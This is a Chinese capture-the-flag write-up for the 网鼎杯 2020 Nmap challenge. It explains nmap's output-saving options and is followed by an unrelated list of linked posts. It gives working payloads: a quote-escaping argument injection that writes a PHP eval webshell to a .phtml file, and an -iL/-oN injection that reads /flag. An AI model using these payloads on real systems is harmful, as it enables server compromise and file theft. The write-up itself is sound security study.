站老是崩,有点难受。

过程
1.题目非常熟悉,以前在buu写过。主要考察nmap的一些用法。


2.
选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件
选项-oG
将结果Grep保存。

nmap -F -oG test.txt 192.168.23.1

选项-oA
该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。

3.尝试对扫描结果进行指定文件保存,
输入-oN aa.txt,然后访问/aa.txt
出现:# Nmap 6.47 scan initiated Mon May 18 15:58:14 2020 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/05cc1 -oN aa.txt \
4.于是猜测是否可以写一个木马文件上去,测试发现过滤了php字符串
可以上传<?=eval(\$_POST[a]);?> 文件名为phtml
payload:' -oN b.phtml <?=eval(\$_POST[a]);?>'
访问b.phtml


5.当然还有更简单的写法。
127.0.0.1' -iL /flag -oN vege.txt '
然后直接访问即可。

NO.2-24 [网鼎杯 2020 朱雀组]Nmap相关推荐

  1. [网鼎杯 2020 朱雀组]Nmap

  2. nmap -oG -iL 写入文件和读取文件之[网鼎杯 2020 朱雀组]Nmap

    知识点: 利用-oG,可以将命令和结果写进文件. 利用-iL 和-oN.其中-iL是从inputfilename文件中读取扫描的目标.在这个文件中要有一个主机或者网络的列表,由空格键.制表键或者回车键 ...

  3. [网鼎杯 2020 朱雀组]phpweb

    目录 解题过程: 找payload: 1. 对in_array()函数进行绕过 2. php反序列化 参考文章: 考点:关于call_user_func()函数的用法,php反序列化(本题不用也能做) ...

  4. [网鼎杯 2020 朱雀组]phpweb-反弹shell

    [网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.p ...

  5. [网鼎杯 2020 朱雀组]Think Java

    [网鼎杯 2020 朱雀组]Think Java 文章目录 [网鼎杯 2020 朱雀组]Think Java 获取源文件 Swagger JDBC sql注入 关于#的使用 查看数据库名字 获取表名 ...

  6. 【网鼎杯 2020 朱雀组】Think Java

    [网鼎杯 2020 朱雀组]Think Java 首先下载题目附件,是一些.class文件,反编译查看. 注意到引入的其中一个包: import io.swagger.annotations.ApiO ...

  7. [网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式

    目录 方法一: 方法二: 知识点: 1)黑名单取巧绕过 2)PHP的file_get_contents函数使用 3)PHP序列化与反序列化构造 访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回 ...

  8. [网鼎杯 2020 朱雀组]phpweb 待续

    抓包看参数   联想到函数  读index.php代码 func=file_get_contents&p=index.php <?php     $disable_fun = array ...

  9. [网鼎杯 2020 青龙组]jocker

    [网鼎杯 2020 青龙组]jocker SMC(self-Modifying Code): 自修改代码,程序在执行某段代码的过程中会对程序的代码进行修改,只有在修改后的代码才是可汇编,可执行的.在程 ...

最新文章

  1. 查询数据库中的表结构信息
  2. MyBatis增删改示例——MyBatis学习笔记之二
  3. 测试女生周期的软件名字,什么软件可以提醒生理期?适合女生可用的便签软件...
  4. 安装Hadoop及Spark(Ubuntu 16.04)
  5. 美国警察开特斯拉追疑犯,时速飙到193公里,然后发现没电了...
  6. vf求计算机系统当前日期的年份数,计算机二级VF常用函数列表
  7. javascript Array类型 方法大全
  8. Android studio无法创建类和接口问题解决办法。提示 Unable to parse template Class
  9. 封装数据库增删该通用方法
  10. iic调试软件上时钟芯片测试,时钟芯片的测试方法和系统 Clock chip testing methods and systems...
  11. MATLAB初学者视频教程
  12. 前端之路:一款轻量的tooltip插件tippy.js
  13. 关于技术人员的非技术能力
  14. Android实现横幅通知
  15. 计算机软件知识产权的范围,知识产权包括的范围是什么
  16. 软件工程 软件质量模型(ISO/IEC 9126)
  17. C++ OpenCV(四):绘制几何图形
  18. Python判断指定日期是不是法定节假日
  19. UML--核心元素之参与者Actor
  20. 解决Whitelabel Error Page最简单的方式

热门文章

  1. 软件项目管理实验一附加
  2. 洛谷刷题C语言:Bold、饱食、公平の意、DOM、
  3. bach cello
  4. Leetcode 初级算法 - 数学
  5. Linux hook系统调用open/read/write
  6. 闪兼云带你游历互联网网赚的不同时代
  7. API 网关 (API Gataway)
  8. 安卓桌面壁纸_效仿安卓?iOS14或将支持“快应用” 功能 可玩性更强了
  9. 致敬最美逆行者网页设计作品 大学生抗疫感动专题网页设计作业模板 疫情感动人物静态HTML网页模板下载
  10. 金蝶k3显示加层服务器失败,金蝶k3提示:连接中间加密服务失败,请确认中间层加密服务已启动...